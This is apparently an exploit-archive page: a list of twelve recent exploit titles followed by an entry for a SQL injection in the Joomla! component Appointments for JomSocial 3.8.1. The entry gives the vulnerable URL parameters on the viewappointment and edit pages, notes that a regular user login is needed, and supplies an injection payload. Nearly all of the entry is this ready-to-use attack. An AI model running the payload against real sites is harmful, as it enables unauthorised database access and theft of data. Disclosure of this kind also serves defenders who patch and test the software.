
12 new exploits MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit) Windows x86 - Executable Directory Search Shellcode (130 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit) Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection Joomla! Component My MSG 3.2.1 - SQL Injection Joomla! Component Spinner 360 1.3.0 - SQL Injection Joomla! Component JomSocial - SQL Injection Grails PDF Plugin 0.6 - XML External Entity Injection Joomla! Component OneVote! 1.0 - SQL Injection
22 lines
769 B
Text
Executable file
22 lines
769 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 25.02.2017
|
|
# Vendor Homepage: https://www.cmsplugin.com/
|
|
# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
|
|
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
|
|
# Version: 3.8.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# Login as regular user
|
|
# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
|
|
# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
|
|
# '+order+by+10-- -
|
|
# Etc...
|
|
# # # # #
|
|
|